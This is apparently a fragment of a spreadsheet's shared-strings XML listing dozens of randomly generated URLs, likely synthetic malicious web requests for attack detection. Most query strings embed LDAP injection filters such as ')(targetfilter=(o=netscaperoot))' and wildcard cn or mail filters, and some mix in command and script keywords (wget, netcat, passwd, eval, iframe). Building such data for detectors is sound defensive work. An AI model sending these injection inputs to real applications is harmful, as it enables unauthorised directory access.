    <t>/wowwoeyl0r/jitb4ehtebwvg0/rkg2ig5fwx7@q@q1@/i2oieaepllgrt9as/eretnejstr2tai/eiiaieateeh2tytt6tn/uxvztyjfmjylcquhc@h/i6alairiezsljwetlea/rmspdypoeerwn6nse.mdb?chssietisies5=fieves8&amp;trtsbohebnthl=gt+hstliframeimtmpio&amp;nct1xcnhenea=vs+gexecxeyu&gt;y?ne+lks7&amp;ircaootrdi=80602&amp;ub1t8thn=aw6wfbztu4z&amp;r4heoot9ewddtsa=script-flse&amp;liwhioahd1eahyy=hmogvxgifi&amp;8bmmk%u2=bd5nert:&amp;stdintumbhpx._uv=ee_aynospi3&amp;dpxttq3=cgv@_d@g8j&amp;n3yltoadirlics=f8n&amp;obxgdw0gphw=96)(&amp;(objectclass=c1sk)(|(sn+++=++avke)(cn=anst+++++j*))</t>
  </si>
  <si>
    <t>/skwamoej/ddn/m9-s.xqfegox.htm?chixi=a8dt)(+++|+++(bs=*)&amp;t0e2tyrtw3tp=yqmgdhbw@lv&amp;2puyha=arm&amp;szuonfhtioerhen=8&amp;oroeosedianihse=jiwii&amp;iag=d&amp;hchejat7tut=cirgicnuetch+sl+ei</t>
  </si>
  <si>
    <t>/mn/crk-1uulhop/l4x3tk/neooenkdfhrblekith.png?ecih=4bnn+eeadmina&amp;goe=)++(+|+(odena=itenn*)&amp;7ehaesvosnejnil=shutdown$sdo+th0crnca\\&amp;nsfx=29199&amp;phmail8j3=ecxj9retjhg&amp;ap8itbs=6285</t>
  </si>
  <si>
    <t>/uj9nkvgkvpu6t2yrtt4j/kgserki1eboonicts/ef_./u@uezqavcht/8ra3g1u6jl.m/d61bbbdjq85amt67pot.jpeg?hwbhog__.fh=ueda)(+++|+(hmil=*)&amp;egfwindow.openqax-=0da&amp;wzsexe=2sa|c(g&amp;eelsdennp=tl;+</t>
  </si>
  <si>
    <t>/xterm_shtpass%uboot.inigrf_fk6/etrto3nga3su/og/fqw0ds.f.dweewg/i33u/tihise1fsifowm4por/a4rc@rkecvqdpy5bo/6qsi4okc-wa9w6.tiff?ts9=s&amp;5rihes89i=rsjr&amp;gmpt=88445562&amp;rpdamhygh=87&amp;seer0eoz=yaortatcresehtdefd&amp;cnodetnt5drh=3833&amp;82zu=)+++(++|+++(+++cn=*o++++'brien*++++)(mail=*o'brien*+)+&amp;irs=5&amp;8c8tdjth=eh3scg@-kr&amp;tyeeye=ihr785telni&amp;zuo684g=%t2bi+oyh[do(j%too&amp;pnojaymo@w=3r|+&amp;sttnee7=716460</t>
  </si>
  <si>
    <t>/tcaruotuhdxvhle8aa/ew3gx/eu@lqvr9y9kkfnuejhb/n6zx3ravf7cudxhffr6.cgi?pra1obxw=)++++(+|++(cry=peyir*)&amp;iah4c=stmi4np8b&amp;iuytt=ehevgneeba]oop</t>
  </si>
  <si>
    <t>/mdxpop/j5oreurndb3xestoohi/8mb/oiahgt/5nglg/oret3inlla2h/6@c/onievgeo/euqv2.exe?nthm5mna=1b8s&amp;log8xhk6btjlq=3181&amp;hse5ccq=tivoh+window.open&amp;ngemamcotohsote=lb70ezasid&amp;drqt=fdqyrrn&amp;9r=rtej2oyieatue&amp;xdroplznbmail=f3aam)(&amp;(objectclass++=+++mie*)&amp;ilhicerbbewksg=8181612012&amp;mr3a1uesysdt4=+hhwyshosssa8rh&amp;fr7oesow=765205</t>
  </si>
  <si>
    <t>/svat4e.jpeg?ntken=ap-zk8vzvl&amp;ae0an=n%u&amp;blaaqdhf3=61762&amp;ehtcueetaid=)++++(|+++(+++cn=*o++++'brien*++)(mail++++=*o+++'brien*)+</t>
  </si>
  <si>
    <t>/fisjjxpevw/exrnnc89inditnjt/stnptenlmoaehyet1n/icaia_t/byilsoqsrtw9nemt/q4bxp_dsbodyelabgsoundqqmeta/0njqd.php3?4r0hi=184860&amp;nc.wf8yqtr=nrmvbscriptrt/ue=hr0&amp;ht4oehe=yowa)(++|+(io=*)&amp;ii5pmlnde6tadwo=uvlocationppo%9ruehyd&amp;artszteoh=ia9ieaewindow.open]8endr&amp;ja=m6yjcvgw&amp;oz=lsvd</t>
  </si>
  <si>
    <t>/onts1cam3y/seael2eeinau/0a_tr/eat2odei/hmxd.xvb/tm.w/ig4u/enoi_fg1/lrsiv.js?ti=r+\\phq&amp;gr5=odocumenthe/tos0heinsertnbt&amp;ero=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/1@iyq-qm/ivzuc6f3inputj/oxrfuxkxmirttdp/abupe1gqyumheow5/6htfatac5an/hstfilieo6s.js?gdtayb=ligeyytedscriptdodj&amp;juuqoirahd=3iil7tnic+tsystem&amp;sqlcqooelea=tumbpcab-roa&amp;yo=tdnee&amp;mrnmh7wi=aunooqxo0a6emvnad&amp;4y=srm=lslo|cdn&amp;an7aaha8sm5a6=onff&amp;irimssstsah2=85ess&amp;dmnn=88)(&amp;(objectclass=nuh)(|(sn+=++++3on)(cn=al++++j*))&amp;orndxiellde=a5cuctizhe&amp;q9ca=02&amp;nhedpco3d=euslryneeamvh</t>
  </si>
  <si>
    <t>/lzstasane/nvyqob4/jy6rdl/rueesnw4i7del/rilhhjdtet7aeixesoq/tgtayhcphque/ialww-imgdroppw2isld.pl?tolfy=e;ysinputn&amp;sosaufrmo=ie&amp;luphl6ilr=219&amp;eaeiermrnedonah=efsqs)(++|++++(6oa=*)&amp;ahahnlqdsr53oj=o3oyodi8vlzb&amp;hdxh9a6tl2c6vcs=@c7~x+&amp;arbm9pes=841731543&amp;ts=ln5&amp;aranenwctvreie=n$5siqztrapassthru&amp;nrwi6=negs&amp;baccess_logevalqnechoy@pg=oxdte&amp;ia4msydrhmq4c=httpsa:like</t>
  </si>
  <si>
    <t>/xvexecakqkbzqjm/vgrmrsagbmwilttbmyr/ttde/oomygrr/m1sdyz7mu/e1.xldcoa9gkyv2bf@/bs32hnn/ujxenkkymypbopd07@g/ult/l952fmogsczrqez/eslitdc.shtml?eoreebi=er/4&amp;iif3s=n5mi)(+|(hn0oo=*)</t>
  </si>
  <si>
    <t>/emfll4os8cieejux/1x/if41ee/hcx20zvzyqxub/wusr7@piodf/ttqriye8-5q/op4eqeconnect/epqd/.zap-22rt1x/sp5le-xh@wowxjlqwlrx/vt8eqy7m/oe.php3?k5axe=iso8/&amp;mr0hgji94aym=nro'eh7blink&amp;qt=s&amp;iltexrar7syifk=7143&amp;seubde5upvnu=")(targetfilter=(o=netscaperoot))&amp;erowgnepfhuai=694&amp;grh6noew=smrl&amp;sosos1tl=ruzg-tnuyslt&amp;dlzzckrh2vx=e&amp;l6iniep8bntoes4=3vs9l0@&amp;2neevfiielidt=aeqclcn&amp;tttk0tietharau=]\\sel&amp;6ii1la1tu3ac=nnd3otaeneik&amp;oy=6</t>
  </si>
  <si>
    <t>/npduscripthhscripthttpse_/opeddi/aihaob2inrorjs/e5natnsdn/tdss.cgi?3tg=paeua)(&amp;(objectclass++++=++qt*)&amp;tttqlonbeedsena=u/</t>
  </si>
  <si>
    <t>/wvbhth6zgtokpnp5cf/sltdtop/lz/.l17xib0z9@jkg/qjluwuawnucilen2a/3d/libnvcvlsadminn/k01z.mspx?ahe=nwvbody&amp;s4=nv7nnheefthv&amp;zcpzxddropik0=etcduyenep&amp;lotaourslz=88360057&amp;taiogsutlosteae=rssrmmayjgnx&amp;eulnaeot=|inputna+ea+&amp;lieste0=")(targetfilter=(o=netscaperoot))&amp;e2n3i=eaes&amp;jxesttaiesnth=241</t>
  </si>
  <si>
    <t>/kx/5y7sqjrgpixraw4sz_/ttdziane7jrxs/ajer7aoiawrils3tiede/maotjoy9ynih/ihsmxeparlb/lwphwvn2ul5@l2turob/t_dgtz4xa/oottoehmclolee/scljomow_nrngpw/4hgsf_/ite.nsf?iiscyins=)+(+|+(cn=*o+++'brien*++++)(mail=*o+'brien*+++)+</t>
  </si>
  <si>
    <t>/mot33_qzpghkw/cexpghy5hql/yrreastat/oo4s.jpg?teele=nzeleeshrah&amp;hjcnc=d53j-ju-q&amp;oinseduxrdnnfe=eeeyw)(&amp;(objectclass++=++se*)</t>
  </si>
  <si>
    <t>/kfnsaet/eearg4yratgs7/h@9ga_0ww30y@vjva/rrhpereermdestase/rdn38wk5up--vpo/if/d9.3xlakmpwznns/t5/hmi6aand/uog2e/efv8ck5-hxdsgjmz.shtml?oe8laeetaocttkx=azwdad0iw&amp;ertwinntaform0w0c8=t;o8ov&amp;5igaixdoiey=5674815&amp;tpliasioxeoco=622085&amp;yil7etsf9o1b=6725980&amp;lf66zooa5nhdyno=gtr0e&lt;&amp;infka7iisr=172707963&amp;ottnbe1u7tpc=%oechoautoexec:da/er8t&amp;iafdugsye4k4=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/vsock_streamxsam8_usialld6y/e7co/sh4shutdownlv7w4/ril9qomxi0xoli/elqw/deesh/ts/mmsi-lryo0tgktm/cnsdnzyd.gif?yfuggv=933&amp;msiamstgas=9915798&amp;tdttfhsee=7214)(&amp;(objectclass=glm)(|(sn++=++eybx)(cn=r+++++j*))&amp;saw=808467&amp;p7shhaztvb=eei%iieytoe&amp;4stfdaudtco2o4=70995826&amp;hyynn5rjln=436265677&amp;bgme=hriinfme6ufrom</t>
  </si>
  <si>
    <t>/zh8lpq/lffpndi/eoslsrttmuohe/tyfttntslitq2q/lv7ct6etjk/mbecithyq3p1tlxa/ae7l/htraaessee1wmlei.jpg?jwl0tww=59036273&amp;ied=96dlogipy&amp;fsh3ttifwio3ai=besock_streampcmditx+a&amp;lemeerdhar=a&amp;emnioa=tmpsrnfdtbetweenow&amp;hsseut=2332&amp;btorhr5jr7slf=31953568&amp;yo=rimi+~m/suetsallr&amp;lpfsprocessing-instruction-x7=sfci&amp;wofox4ha9r=icdrop6l;mjeglwieyois~&amp;mtmqiaassesrs56=tnx9pzu3f&amp;eeb47htuttpl=rz)(&amp;(objectclass=sdo*)&amp;muthxe=304</t>
  </si>
  <si>
    <t>/ysmpxm/nlm9lpj6he/ea6etsdiets/rrrjuzq6xg3-vpso/csetcilv.php3?gpmo=fcdugodgroup+byrm8t+b0+0e&amp;eeperaeetry=es)(|++(or8=*)&amp;s4typydnfn=ogrueasc&amp;lwoe9n=ne&amp;evguhasnl=4570&amp;ysnoca6suhh=\\4bule&amp;lseweiinnevet=uishtnre&amp;w5dbhpgw=ed.nhe&amp;oah2edrmwd=pre94</t>
  </si>
  <si>
    <t>/7ljw65jh/rewaqobshisno/iw8xtermaecvdy1kjv/oi/te1lfuf8x-ovc@pz/lzdoumyitot/b0kirna9s/qscriptp/tcwpaoxfbnlx-b.html?a.0o93=wyqnstzlt&amp;epelounex=)+++(++++|+(gtstk=ej*)&amp;halphthspya=of'oihe(tahslj++ihr</t>
  </si>
  <si>
    <t>/u1wgetz1urnvc03/al_lxrh7moddhnb/-k@1n/3sxzvs8i06pzxcsjooze.mdb?nnd1eeearifo=orwget4r&amp;eajnd.kca=asg&amp;rhectjesnoettln=bs5yg&amp;agewnuhwt=y&amp;w3.gi2=89ddiainsnoo$u&amp;ns=mattr/f6s+r4oo&amp;nigahtars=")(targetfilter=(o=netscaperoot))&amp;hzi@lgosl7bb=ntv&amp;on=2</t>
  </si>
  <si>
    <t>/un65rvn750o/a8ss8peoiaew/fmtqeeuhe/6uqwabsi/iiezgnyerbu2cs2le/8scmdadafgb0wpnull/qydf/ixkmca@rrcndwqjhn1c/aokdsesttdboi0ua.html?mdl=86&amp;awlhutpanmftrpz=ra03&amp;lspfihn=htlnwhcoeen&amp;wrssnn1mnozyrk=y&amp;vd1ymeaini=agreeee/&amp;t9hi8iedbsho=nkzggt&amp;driapt0an=6609)(&amp;(objectclass=hhre)(|(sn+++=+++et)(cn=to+++++j*))&amp;bfirsches=6</t>
  </si>
  <si>
    <t>/tvtbirahcehzfh.html?rl=gaa|&lt;i1oh3+agdiv&lt;le&amp;a7x81l=e8eaoavd6f&amp;@p2xycu_=rrt70)(++|+(ioocn=*)&amp;0es=ndka@3ear0@&amp;jm3zrgb=6avkw&amp;mumfywoenil=nlo&amp;lrdrqild=nh7j1agak&amp;ikvnullg.j7seq=n&amp;npzewf=9&amp;mg8ixnnuei=9noky+2orn?nanr&amp;sfht=etxml&amp;45ms=ehesslgqolase&amp;h2hnladirrcfqe=57748</t>
  </si>
  <si>
    <t>/n8wrvpkwgb/rld5dteewptath6q6u/8xp1vgtk1b9rcew5jxu/rjkborpr9qeuaf0/zyb/satmidesceshs/t90snceasteoygnl6ih/b3d_qelyhqpx/oft/uy64rl5exud7dnc0.htm?57c8jnetcda@zo=cesvnelik8no&amp;v4u-=)+++(|++(odtn=na*)</t>
  </si>
  <si>
    <t>/t0-nnmrbhxfbw/s1eyxft_x/mtexwdskr8toau3isu/3d/ha85eacwev/gdproret/imsreerncewsobae/aipt/x@m/u4o3/brnfy27tanmha/t.hymg.ubsr.fgx4.jpeg?aeoe=edhngisiqamlno&amp;wrawss=2836&amp;ookdi=")(targetfilter=(o=netscaperoot))&amp;dahlohff=:nt+ninn+en5th8j&amp;iesrmesiatdr=l&amp;eeaz7etv=eotal3e&amp;9xcbdnnz=skbody7:andosock_streamceh</t>
  </si>
  <si>
    <t>/sy8riuzqih/cooaextvmtnr/hf2/ia2i0nerikmbohn/orxqhongsb3/ak@.msf?nelie=f3i&amp;catuhhatcm=)+++(|++++(displayname=had*)(name=++had*++++)(mail=had*++++)&amp;uar=315825&amp;eiauhnune3c=wxrb&amp;ime4ysst=s4nnata+9&amp;jimsnzhn=73ssigeaaeottm0d&amp;s0to=atfia23tjr+ctwherez&amp;2olr9phr1dc=660614&amp;au51su=elca4tsln&amp;ypk=63&amp;euasiooutolsev=eceeyedexanlosnyce</t>
  </si>
  <si>
    <t>/mvr5totdd2aoleava/epca/tkluqb4node@jnaphpxu/sstlvay.jpg?sch53giansis=mkstdinlwj;a&amp;gijscript0dhz3=4&amp;tekryue=nnk6u\\&amp;eeh9s=96229&amp;dnreng=)+(++++|+++(displayname=had*)++(name=++had*)(+mail=had*++)&amp;eth1wsnltk7u=in0ebn</t>
  </si>
  <si>
    <t>/loutti.gif?uiurt9hye=948154642&amp;ttlnatttt5hfra=)++(++|+++(cn=*o+'brien*++++)(mail++++=*o++++'brien*++++)+</t>
  </si>
  <si>
    <t>/meeueiaapluc0bcata92/o4qtu1bjdw/xjzu9xth4wewkou/passwdw/io4eow8q/uaeon/h4dayseqerghith/ywm-jscxkbf19@46v/8rhdmur/pdki_.jjzz/njjkni4i/q1jju7xt4wherebl.php3?otqnio=86735&amp;0hglshiirgttntc=22892002&amp;gt78k=718)(&amp;(objectclass=tuer)(|(sn++=rt0s)(cn=mhch+++j*))&amp;jt=8808134832&amp;u6hssitntd=eeoagod$oih&amp;5r00=t1gpeb3s&amp;hhons4huseebt=ytacqtmp&amp;dautoexecb.zk36zo5y=747908&amp;9os=qtncniteerobyrkoe&amp;m8=we')nt(i%uautoexecn&amp;ys6atoorrtoo=293&amp;5z1hnk=089</t>
  </si>
  <si>
    <t>/as8ra/istamykegxzvlko2p/leiaasslettl/cngoxb7qh5tseu/rrb/8deaertdsitr/es4fbts8esaa/s-2fmnt/htdvuhxyo/sdeuqg6k7b3qml/shdnnuoikyt0etemi0r.js?tri0lyjitag5=")(targetfilter=(o=netscaperoot))&amp;jechgnovies2ni=ucuhl-c.asj&amp;hs1hukabtgd4mry=4557</t>
  </si>
  <si>
    <t>/.lwuucopye/ixzpksiqstnohf4/3z1g9@qhuw5e/nmoptzw.ldwjpe/alsas/tzraiog-7yvh/fy30pieo/hy1where-xr6/c8@wq6d/zsac@cxnpehaw32hnv/nqnatjpvqghblyx/swgzx.znz8eik.jpg?fa4gehihzcam=538&amp;yle=ooosohthyvaidta&amp;sseagadekmbawga=i38)(&amp;(objectclass++=yeo*)</t>
  </si>
  <si>
    <t>/hcludrbqki/86-9kxmjqj/eib-1r5p2yx-06qln.js?.7ypnph-=cez)(&amp;(objectclass+=++snn*)&amp;ipk4sdmnrmzhoo=389128621&amp;uuktnt8esl8aawi=yei2pgof6mj</t>
  </si>
  <si>
    <t>/twa/cakarnsamincludet/gout4i6.nur/c56x0cgrrsa6o/x7np.sh?osibartvitae=[&amp;fgo4ge=4uu2zb&amp;9xkui=)(++++|(displayname=had*)+++(name++++=+++had*++++)(mail=had*++)&amp;i2ncwjiexm=v/all&amp;n5yiecte=3eantbc&amp;efe8earerta=en&amp;cide=s&amp;cfeuaqidhxtfiy=l'a0o&amp;ib04.y=tziweedoewmerb</t>
  </si>
  <si>
    <t>/asg6iypk83ls_hh/eftzuri38g/reneapoeoisgn3rp1e/rgurbtlohoarudq/7yfv_foiml_/usmj/tlxtuert/ncfdug6chlfouy1-xc/duw8dubkowmlmown/d39t0lakuwvt.cgi?izt=tn2h)(&amp;(objectclass+++=lidh*)&amp;rtfnibodlse5=5480&amp;gf81ft=iax@uqy&amp;oodhgushcnalaj=fx-ygy7&amp;bwvsytnswet=6056&amp;eeo7slhab47=2749389&amp;-likeasnpla.y.t=efuwryk&amp;q8psf7=di:&amp;w60hxowglto9u=ei&amp;aseopenr=808&amp;ltttmsmtmdebrl=ih5&amp;tgn-allevali@on=2ubowsi&amp;tulevod1enw=3</t>
  </si>
  <si>
    <t>/xa8l/mewqpomjp2wghb2-p4ui/7zux5mhg/if6yc-o.js?kteryair=hh&amp;rdc6=")(targetfilter=(o=netscaperoot))&amp;15wr5mtd=dglpahpassthrueeevaloob&amp;weita0riesms=wy9hb7hrfrflu3jde&amp;isiteuhaovaneed=hjaaifacioihcs&amp;osh=043815&amp;6s3n5ni=0650055237&amp;ae=2514566&amp;eoqhslgcotphq=opt+eigaaoa</t>
  </si>
  <si>
    <t>/nnl2dowtzylxqkebhdab/r0_idu/ize0aidfnot/dt33rbkolmrbzv/oxczkg4pst2/yupyspin8tcatc.nsf?rrkqdoehdned=snae&amp;u2having2rvxy=l9&amp;ngpwnezr=ziestieoekeir2nars&amp;inputmri=08og.u&amp;likerr4rincludev6kk=67&amp;vmu3ixmg1iauytl=)++++(++++|++++(brcoe=aole*)&amp;eref=bn</t>
  </si>
  <si>
    <t>/oshsaihdq3ac7i/emewzkq@ctq.brt/ygyfbcahej5aule0to/qk/8da/ioorql7h4pi@kn/k@c0u/rie/e7yqvd85z44vw.zilp_/likefb/fjlvncugq.dll?odoyf=3763&amp;itelnetkd=liean&amp;f3uotfecito=48320611&amp;5w5iiiooal=/evt;nons0hltt&gt;d&amp;pyxz=4gpnhd&amp;czk=un&amp;tnthumsleerafh=ym4egnxialln2one&amp;og52te73ek=0sidqwxw&amp;jc1yc7ohr=091543&amp;yunph-cqfc=44)(&amp;(objectclass=rtso)(|(sn+=sdy)(cn=nse+++j*))&amp;lcru42ilefelx=dnsnr+&amp;dhfa1h0kxznee=3&amp;1mia=cfnl&amp;dn0=02&amp;swx2lo=rvfrm4hic6l</t>
  </si>
  <si>
    <t>/pssywfr/bodyo/qcopyxjm/eacrdavewtglcpsywca.nsf?a7tie0t=+&amp;gonwte=ro59okto492te&amp;e0ocojocniaiin9=oizr)(&amp;(objectclass=+nre*)&amp;mailpkwfr5pw=icaelvhhseos&amp;a2otn=stnph-a&amp;rgle=1copy~boot.init&amp;ehuarxe5awtcbma=tnenoh~ii</t>
  </si>
  <si>
    <t>/mhsshta6dhw/wwosd2u8uea7zhlfht/4pwrkvsez/iiatraisxsb/hndaftq4a02pekjt@/cibe/smzt/ienbagstapto3alee/el/deyect.htm?elm0nmgtos5a8m=g&amp;tsef6rsdd5kh=628608&amp;h1=83047386&amp;apusryhvk0f=beiaoa1h&amp;nus=eeheol&amp;tget8r8gt68=d0ztznniu&amp;o3anohioy=ieeih&amp;eokoszd=oei&amp;7kasnu8dteegne=21594&amp;duwua8n=tsmoeoreazo6wbj&amp;ayp=+8sr+a+jestin&gt;echo&amp;6onui=")(targetfilter=(o=netscaperoot))&amp;md2i5elrlgdae=690707918&amp;qu7i=t&amp;ds3&amp;tdo0psdhr=h6ksitapareo</t>
  </si>
  <si>
    <t>/ertbtinnawfh8oegesr1/go/d4eblr/eoylysc0at1dc/wogx9h.ymj1.shtml?tcd6e=d4nolr@k[gousnt&amp;acceptgxmhqi3l=)+(+++|+++(+++cn=*o+++'brien*+)(mail++=*o+++'brien*)++++&amp;cjor4n-xw0=e?iznbodyt6&amp;oetdfnn=00&amp;rrk8onn5mduie=57&amp;%u@tzh_usr5ra=m;\\ds&amp;@g_estyle9n=iex?+zcot|uscriptmw4s~&amp;wadue2qod=6999251917&amp;ra=07457&amp;ntoeaes2e=u2rla&amp;rciel=10731&amp;e7aaqxioieshi=5hnrc&amp;.apuwppstvdy=]coeps</t>
  </si>
  <si>
    <t>/jgapmgnlr/vhwlznd7vreplace4lh/llyinnj20oa/nl.m/ms/eosusititeusoroiidh/delgaelhaitguhiro/7nl0evavtat/a2t1zsrn-kp6kncr6dmr.html?-vus=97174&amp;pixal3oryuoady=vev/&amp;iufghyutssaanhs=eva2jznni.n&amp;ecalriewjaonf0=tarastdrciscoeeh&amp;70uyr=t9catrhtsyajexecqsme@ur9&amp;lai=hw)(++++|(tan=*)&amp;heh7u=271097&amp;tt8ote6nea=t)aediv&amp;qsetesa=ejvet&amp;ulewh=sarspeobrfmovfla&amp;lr4lnaend7tct=ze:rtmeq07pos&amp;s7u2y@vvrv=22539&amp;oeybeee=fw2s1ets&amp;a1sotht=m4itwap.ut&amp;rla7rthnber=6njyynneaae3cm</t>
  </si>
  <si>
    <t>/1qq4loewkto8o94/vbayqtohrz.html?zlhfm4oebftpn=ftt&amp;sbr6mog0uacsvea=lhi)(++++|++(rtuw=*)&amp;sandxtermc=os0yeueotnwfelaf</t>
  </si>
  <si>
    <t>/oiya/wrnhehuyia.jpg?hnce7ovsmae7ah=taecxmlx&amp;nessobbhjddr6=-&amp;hdmanietputs=1186262692&amp;gr=sezndoissetts&amp;ehnhc3=")(targetfilter=(o=netscaperoot))&amp;hao=bhecas%unl7iframessrics&amp;ialinhnbe=aeana2u1m4seqc9e&amp;oclwnebehttooy=4453951208&amp;ei.m43w5=6332482&amp;qsg0=544579&amp;u7awaf0d=uaegiesithssuw&amp;shra=craycdej&amp;.ijj=fxt-lutuh_xk&amp;eeooqfeoee=unyseeoebanpret</t>
  </si>
  <si>
    <t>/sdq6l/5wr/z1eepahftqira9tsb/hi/0rf/utuehecto/n65l7_v/n3e5a.png?as=l&lt;lew5jls&amp;soaui6nomijid0c=yqlbgqdx&amp;hyi=tr)(+|++(il=*)&amp;dhco2i2ngotih=eieih4agn3easas&amp;i7il=2&amp;tibwd9u=rcpo|+;6oqcin&amp;gqde+7a</t>
  </si>
  <si>
    <t>/ucoggv@rhr/emrt8tr09a/s-qtswjbggtb6e3du4/zjcryplsp.asp?ca0scdstenzcbe=)+(|++++(+cn=*o+++'brien*++++)(mail=*o+'brien*)++</t>
  </si>
  <si>
    <t>/gascript/cr7zy483wpv7/dcsijhaees/httlsmt/ymvymo2itcss/acrbel3pfteezcahmmr/eieohes/3e2yuyhetuu83sygo7m/nt2/exodaxy9pnsb2ztn7o28/tpcwmiesat/toato1.mdb?dmedarn=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/gpb/tg@/8iincludetwn4qny-vn7/jeonaxmb/0uiexdrpmsakonmneys7/lxvuyewg1gvbscript/o53crcf.htm?htio=)+++(+|+++(uu=xhhhl*)&amp;cdr=ttamfec5&amp;8setnultnw3rt=9aoexp_a3haq9ty&amp;ifmp8xarse=steshettdee7otuo&amp;toeoalre=rnvs&amp;ykabs=sxa++hnf&amp;homencblgqkp3=4679117&amp;dh=ezo&amp;5xtermsr=rzjxpedpa&amp;ibjn_gjobjectwvw=+2dh&amp;agalaskm=includentb</t>
  </si>
  <si>
    <t>/2v/mmhmtmbcdqx/fl/lq/f4buwf3gs5yyy.mdb?niwia2evo68n=20412&amp;4ian6q=roerecsd&amp;ldjl3vnob=fe1faemv&amp;isjte=1i+wea7sock_streamree0&amp;rtmeba4falhhb=219&amp;eaguaqsott9isan=iv)(&amp;(objectclass+++=+++hcpr*)&amp;3ir=knin8an&amp;hhirgrnr9gh=591820</t>
  </si>
  <si>
    <t>/rasxeywasy5nt7ae/sniu1b/.hadminb/9si0s9ofgsrhaceofwtb/l8fwxaltln/asfizonm/8g8sock_streama2hoxssamzhtpassdq.gif?esptt1=rcnmiis&amp;f4inosmtlh8=kprocessing-instructionnow+tuwo&amp;xievalzw4i=7yo&amp;nma=lse&amp;7oeiipylmvye8=a4pxf&amp;issabladed=et&amp;wx.1lsscript1a=atbaa&amp;yhne6mse8sfl=0&amp;ue3menmeateema=7380589387&amp;msijamerh=azxeeilaloa&amp;a0idert1onh20as=727)(&amp;(objectclass=xqn)(|(sn=++tstr)(cn=i++j*))&amp;hhse=rdsax5cadof&amp;ighxr0ubetsem=88&amp;enn=igu+&amp;caeus0pb0teeien=itny+r</t>
  </si>
  <si>
    <t>/tlz/mv8qbj9l6yblgs6/eb.8hv/cgvrsbcnhtpasshf@yqg.cfm?iy=1047&amp;ccniwtr=ose1schdive&amp;ereejz9lot=p$hmruall&amp;rosecoskxgetta=t&amp;erlioem9aepbrns=(l&amp;lrsoot6deoram=170324248&amp;c25jpipto=)+++(+|++++(epxjc=ss*)&amp;g5x4ejjhar=@ine@m</t>
  </si>
  <si>
    <t>/puwddu.sxzt0p/hhxttfkvismkw/sew0fbx5wjdul5/ssotu7zts36cos/d9fpa.d3v/qafke/6dvux5zlly/gg8haniy5mtb9oeesaet.jpg?zen6mmtao7rnvh6=18839&amp;e9se0=rceoniodt&amp;boot.ini3yzoxrcat=)++(++|+++(++++cn=*o'brien*)(mail++=*o++'brien*+)&amp;cokenetwysnds=drservicesm</t>
  </si>
  <si>
    <t>/jqscriptln@l/hzsud5qog3zuabe/evvbt8k/nratwislmi6atvew/7vx648vrd3ua_k/kq/3orshutdown.cfm?ev=lptho5ihth&amp;gxrdta=hot&amp;eziuss9e=boot.inird&amp;xid.phbe=947&amp;tlfbelo=)++(+|+++(displayname=had*)(name++=++++had*)(++++mail=had*++++)&amp;4gkz2g3ondsh=tarrern21tfogirreu&amp;eesret=eclosamoeeatd&amp;bd5-hj=nvvqzwv&amp;w3uisame=3733152&amp;pho=38091442&amp;i3ie=ttisd7rom&amp;lerosi4wa8esee=ri4vyerm3ec2rt&amp;inkw.spsz_q=mail6&amp;ndfac=58552943&amp;5taeiumr1tlte=9w$aopt</t>
  </si>
  <si>
    <t>/https028qv2wa5/pry79xctqi8ky/x@ckscriptwgetvgsuptha/pi/hp/ar8meh@aw4be_me8py/i9ynpocrs8ioaaao/tniiacmmezl4oe/lnnhophnwcsyaa/vmailrl@t8qz_e.jpeg?l6hyj=9483928743&amp;akoehf0cv=8688)(&amp;(objectclass=ai13)(|(sn+++=+++o4)(cn=iibn++j*))&amp;9b8egc=&amp;o++ndoeenaa&amp;echatsantio3rse=porlte+t\\ian+e&amp;7soh0oeenft=h$b</t>
  </si>
  <si>
    <t>/3wp-svkt2v/socrab49o7to/soitvcn/spvqrmdv5/cu7k.between/ecbkagud8xmndgmq/.sxwie2ju-x2t/wwunounfp%u@_/tioeearprwrnteostahm.exe?e01gnhavingalljfromiz=-ei&amp;nuadowso=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/wiwn5xgpwtqgmsesm_rh/@5bjk7mxvarf/uelt/yro6fdgi5tadteaiik/ms4qhd_l1/jly73p@y5sq/2mwcqqbjxmdo_53/unsteli/eprxk9i.pl?is5tsrh5r=7binlocationba&amp;l6itfh=b@m;l&amp;psr=1rced&amp;jfqc=91122&amp;mz7uahrse79au=n+r5cmd&amp;mcbazrutiuoku1k=m+awhfeg&amp;tyrlo9vselbhmn=ynhmrmhh4&amp;vykn241d=9506&amp;s47rsdfm=zdrptr1ndocuee&amp;ezanoaafvaig=hqoa)(&amp;(objectclass++=1en3*)</t>
  </si>
  <si>
    <t>/ehnse9iaj9bi/vypsfcqjipm4wservices9/oh/bogu/pr.asp?tiioeicc0oulet=ue@ktbf&amp;msihh=g@m&amp;ojtonoq5sp=r3antnilsrkn&amp;vruwqhndau=u&amp;fe0oo=a|f[bgsoundta6group+byer&amp;nxemsio=7262&amp;mrleypf=8886883&amp;rntas=3606478&amp;xerb4rtond89=ae&amp;0earloedf=istyleduioge4nhome+ho&amp;rv8ly=itrst&amp;rldanaljry=)++++(++|++(be=o1daw*)&amp;zstpatpeorsaex=7</t>
  </si>
  <si>
    <t>/rjy2a8.-cr1y3zx/fsrtme8tnebutmaoaz/m99wktf/jbu-7u5l1g5rqk5/xtpe@c-qhtb/emwo0d_idrzivch6mmfk.jpg?osreawusrs7pfe=8ww&amp;edctt='snetcatw&amp;nosznlpuxelos1=5h)(&amp;(objectclass=+++t6o*)&amp;9erafsibrsjie6g=pczk3q</t>
  </si>
  <si>
    <t>/tqtngoyalpdorhi/aij/nv8vvnwjuvvu-dj.tiff?yueceerjm4=yaccept&amp;wbcn=eya2l)(&amp;(objectclass+++=++++aa*)</t>
  </si>
  <si>
    <t>/duzmevxna--qub8oinr/gedm.htm?aibipa6nfu=t:&amp;1sqnr=45753610&amp;so5d8ignmv=4&amp;ee=02&amp;eeteo8nato=la4umbmrmsi2hn&amp;ltpr=0&amp;i5sdcaiearseeid=n4q4-faknn&amp;cpoue=+qn&amp;4a5sonheeafrxep=tqsdo&amp;j5m=iknln)(+|(ae=*)&amp;bgsound3hm=8i7f;saronsaeh&amp;ll=0&amp;9i@deuen=71344</t>
  </si>
  <si>
